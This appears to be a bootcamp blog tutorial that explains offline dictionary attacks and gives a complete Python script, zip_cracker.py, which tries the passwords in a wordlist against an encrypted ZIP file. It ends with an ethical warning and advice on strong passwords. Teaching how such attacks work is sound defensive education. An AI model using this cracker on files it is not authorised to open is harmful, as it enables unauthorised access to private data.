Week 2 Session 3 Task: Dissecting How Brute Force Works with Python

Week 2 Session 3 Task: Dissecting How Brute Force Works with Python

The attack we will perform is an offline dictionary attack.

  • Offline means that once we have the encrypted ZIP file, we no longer need to interact with a network or the original target. The entire guessing process happens locally on our own machine.
  • Dictionary attack means we won't try every possible combination of characters (which could take millions of years). Instead, we'll try every password from a pre-compiled list, also known as a "dictionary" or wordlist.

Steps:

  1. Prepare a Wordlist: Create a text file (e.g., wordlist.txt) containing common or suspected passwords.
  2. Try Each Password: The script will read the dictionary file line by line.
  3. Test the Lock: For each password, the script will attempt to extract the contents of the ZIP file using that password.

The Code: Dissecting zip_cracker.py

This is the core engine of our tool. Here's the complete code:

# zip_cracker.py
import zipfile
import sys
from tqdm import tqdm

def crack_zip_password(zip_file_path, wordlist_path):
    try:
        zip_file = zipfile.ZipFile(zip_file_path)
        with open(wordlist_path, "r", errors="ignore") as f:
            passwords = f.readlines()
    except FileNotFoundError:
        print(f"[!] Error: File '{zip_file_path}' or '{wordlist_path}' not found.")
        return
    except zipfile.BadZipFile:
        print(f"[!] Error: File '{zip_file_path}' is not a valid ZIP file.")
        return

    print(f"\n[+] Starting brute force attack on: {zip_file_path}")

    found_password = None
    for password in tqdm(passwords, desc="Trying Passwords"):
        password = password.strip()
        try:
            zip_file.extractall(pwd=password.encode('utf-8'))
            found_password = password
            break
        except RuntimeError as e:
            if 'Bad password' in str(e):
                continue
        except Exception:
            continue

    zip_file.close()
    print()

    if found_password:
        print("="*45)
        print(f"✅ [SUCCESS] Password Found!")
        print(f"  🔑 Password: {found_password}")
        print("="*45)
    else:
        print("[-] Attack finished. Password not found in your wordlist.")

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: python zip_cracker.py <zip_file> <wordlist_file>")
        sys.exit(1)

    zip_file = sys.argv[1]
    wordlist = sys.argv[2]
    crack_zip_password(zip_file, wordlist)

Step-by-Step Demonstration

  1. Prepare Your Files: Create a ZIP file (e.g., dokumen rahasia.zip) with the password rahasia123, and make sure the word rahasia123 is inside wordlist.txt.
  2. Install Dependencies: Install tqdm with: pip install tqdm.
  3. Open Your Terminal: Navigate to the folder containing the script and files using cd.
  4. Run the Script: python zip_cracker.py "dokumen rahasia.zip" wordlist.txt

Example Output



    
Conclusion & Ethical Considerations

    
Building a tool like this is a fantastic way to understand how an attack works — and more importantly, how to defend against it. This attack succeeded because the password was weak and predictable.

    
⚠️ Ethical Warning: This tool is created for educational purposes only. Using it to access files you do not own or have permission to access is illegal and unethical. The key takeaway is: always use long, complex, and unique passwords to stay safe from dictionary attacks.
#IDNBootCampCyber




































Komentar











Posting Komentar



















Postingan Populer